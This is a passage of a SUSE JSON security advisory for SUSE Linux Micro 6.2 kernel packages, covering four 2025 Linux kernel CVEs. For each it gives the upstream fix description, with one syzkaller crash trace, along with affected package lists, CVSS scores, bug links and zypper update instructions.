"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68773"
},
{
"cve": "CVE-2025-68775",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68775"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/handshake: duplicate handshake cancellations leak socket\n\nWhen a handshake request is cancelled it is removed from the\nhandshake_net-\u003ehn_requests list, but it is still present in the\nhandshake_rhashtbl until it is destroyed.\n\nIf a second cancellation request arrives for the same handshake request,\nthen remove_pending() will return false... and assuming\nHANDSHAKE_F_REQ_COMPLETED isn\u0027t set in req-\u003ehr_flags, we\u0027ll continue\nprocessing through the out_true label, where we put another reference on\nthe sock and a refcount underflow occurs.\n\nThis can happen for example if a handshake times out - particularly if\nthe SUNRPC client sends the AUTH_TLS probe to the server but doesn\u0027t\nfollow it up with the ClientHello due to a problem with tlshd. When the\ntimeout is hit on the server, the server will send a FIN, which triggers\na cancellation request via xs_reset_transport(). When the timeout is\nhit on the client, another cancellation request happens via\nxs_tls_handshake_sync().\n\nAdd a test_and_set_bit(HANDSHAKE_F_REQ_COMPLETED) in the pending cancel\npath so duplicate cancels can be detected.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68775",
"url": "https://www.suse.com/security/cve/CVE-2025-68775"
},
{
"category": "external",
"summary": "SUSE Bug 1256665 for CVE-2025-68775",
"url": "https://bugzilla.suse.com/1256665"
},
{
"category": "external",
"summary": "SUSE Bug 1256666 for CVE-2025-68775",
"url": "https://bugzilla.suse.com/1256666"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68775"
},
{
"cve": "CVE-2025-68776",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68776"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/hsr: fix NULL pointer dereference in prp_get_untagged_frame()\n\nprp_get_untagged_frame() calls __pskb_copy() to create frame-\u003eskb_std\nbut doesn\u0027t check if the allocation failed. If __pskb_copy() returns\nNULL, skb_clone() is called with a NULL pointer, causing a crash:\n\nOops: general protection fault, probably for non-canonical address 0xdffffc000000000f: 0000 [#1] SMP KASAN NOPTI\nKASAN: null-ptr-deref in range [0x0000000000000078-0x000000000000007f]\nCPU: 0 UID: 0 PID: 5625 Comm: syz.1.18 Not tainted syzkaller #0 PREEMPT(full)\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014\nRIP: 0010:skb_clone+0xd7/0x3a0 net/core/skbuff.c:2041\nCode: 03 42 80 3c 20 00 74 08 4c 89 f7 e8 23 29 05 f9 49 83 3e 00 0f 85 a0 01 00 00 e8 94 dd 9d f8 48 8d 6b 7e 49 89 ee 49 c1 ee 03 \u003c43\u003e 0f b6 04 26 84 c0 0f 85 d1 01 00 00 44 0f b6 7d 00 41 83 e7 0c\nRSP: 0018:ffffc9000d00f200 EFLAGS: 00010207\nRAX: ffffffff892235a1 RBX: 0000000000000000 RCX: ffff88803372a480\nRDX: 0000000000000000 RSI: 0000000000000820 RDI: 0000000000000000\nRBP: 000000000000007e R08: ffffffff8f7d0f77 R09: 1ffffffff1efa1ee\nR10: dffffc0000000000 R11: fffffbfff1efa1ef R12: dffffc0000000000\nR13: 0000000000000820 R14: 000000000000000f R15: ffff88805144cc00\nFS: 0000555557f6d500(0000) GS:ffff88808d72f000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 0000555581d35808 CR3: 000000005040e000 CR4: 0000000000352ef0\nCall Trace:\n \u003cTASK\u003e\n hsr_forward_do net/hsr/hsr_forward.c:-1 [inline]\n hsr_forward_skb+0x1013/0x2860 net/hsr/hsr_forward.c:741\n hsr_handle_frame+0x6ce/0xa70 net/hsr/hsr_slave.c:84\n __netif_receive_skb_core+0x10b9/0x4380 net/core/dev.c:5966\n __netif_receive_skb_one_core net/core/dev.c:6077 [inline]\n __netif_receive_skb+0x72/0x380 net/core/dev.c:6192\n netif_receive_skb_internal net/core/dev.c:6278 [inline]\n netif_receive_skb+0x1cb/0x790 net/core/dev.c:6337\n tun_rx_batched+0x1b9/0x730 drivers/net/tun.c:1485\n tun_get_user+0x2b65/0x3e90 drivers/net/tun.c:1953\n tun_chr_write_iter+0x113/0x200 drivers/net/tun.c:1999\n new_sync_write fs/read_write.c:593 [inline]\n vfs_write+0x5c9/0xb30 fs/read_write.c:686\n ksys_write+0x145/0x250 fs/read_write.c:738\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xfa/0xfa0 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\nRIP: 0033:0x7f0449f8e1ff\nCode: 89 54 24 18 48 89 74 24 10 89 7c 24 08 e8 f9 92 02 00 48 8b 54 24 18 48 8b 74 24 10 41 89 c0 8b 7c 24 08 b8 01 00 00 00 0f 05 \u003c48\u003e 3d 00 f0 ff ff 77 31 44 89 c7 48 89 44 24 08 e8 4c 93 02 00 48\nRSP: 002b:00007ffd7ad94c90 EFLAGS: 00000293 ORIG_RAX: 0000000000000001\nRAX: ffffffffffffffda RBX: 00007f044a1e5fa0 RCX: 00007f0449f8e1ff\nRDX: 000000000000003e RSI: 0000200000000500 RDI: 00000000000000c8\nRBP: 00007ffd7ad94d20 R08: 0000000000000000 R09: 0000000000000000\nR10: 000000000000003e R11: 0000000000000293 R12: 0000000000000001\nR13: 00007f044a1e5fa0 R14: 00007f044a1e5fa0 R15: 0000000000000003\n \u003c/TASK\u003e\n\nAdd a NULL check immediately after __pskb_copy() to handle allocation\nfailures gracefully.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68776",
"url": "https://www.suse.com/security/cve/CVE-2025-68776"
},
{
"category": "external",
"summary": "SUSE Bug 1256659 for CVE-2025-68776",
"url": "https://bugzilla.suse.com/1256659"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68776"
},
{
"cve": "CVE-2025-68777",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68777"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nInput: ti_am335x_tsc - fix off-by-one error in wire_order validation\n\nThe current validation \u0027wire_order[i] \u003e ARRAY_SIZE(config_pins)\u0027 allows\nwire_order[i] to equal ARRAY_SIZE(config_pins), which causes out-of-bounds\naccess when used as index in \u0027config_pins[wire_order[i]]\u0027.\n\nSince config_pins has 4 elements (indices 0-3), the valid range for\nwire_order should be 0-3. Fix the off-by-one error by using \u003e= instead\nof \u003e in the validation check.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-rt-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-source-6.12.0-160000.26.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68777",
"url": "https://www.suse.com/security/cve/CVE-2025-68777"
},
{
"category": "external",
"summary": "SUSE Bug 1256655 for CVE-2025-68777",
"url": "https://bugzilla.suse.com/1256655"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.2:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Micro 6.2:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Micro 6.2:kernel-default-extra-6.12.0-160000.26.1.aarch64",
